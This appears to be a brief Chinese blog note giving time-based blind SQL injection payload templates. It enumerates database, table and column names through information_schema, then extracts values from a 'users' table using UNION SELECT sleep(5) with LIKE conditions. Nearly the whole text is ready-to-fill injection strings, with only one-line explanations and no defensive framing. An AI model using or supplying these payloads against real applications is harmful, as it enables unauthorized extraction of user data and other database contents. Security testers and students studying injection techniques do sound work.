SQL注入--根据sleep判断
找数据库名
找字段
1 ' union select sleep(5),2 where database() like '{数据库名称枚举}%';--
union是联合查找数据库,当查询为真是sleep生效‘;--’能注释其余SQL
找表名1 ' union select sleep(5),2 from information_schema.tables where table_schema ='{数据库名称}' and table_name like '{表名枚举}%';--’
' union select sleep(5),2 from information_schema.columns where table_schema='{数据库名称}' and table_name='{表名}' and column_name like '{字段枚举}%';--’
找出一个后在后面非
' union select sleep(5),2 from information_schema.columns where table_schema='{数据库名称}' and table_name='{表名}' and column_name like '{字段枚举}%' and column_name !='{已验证字段}';--’
找字段值
' union select sleep(5),2 from users where {已验证字段1}like '{字段1值枚举}%';--
' union select sleep(5),2 from users where{已验证字段1}='{字段1枚举值}'and{已验证字段2}like '{字段2枚举}%';--
浙公网安备 33010602011771号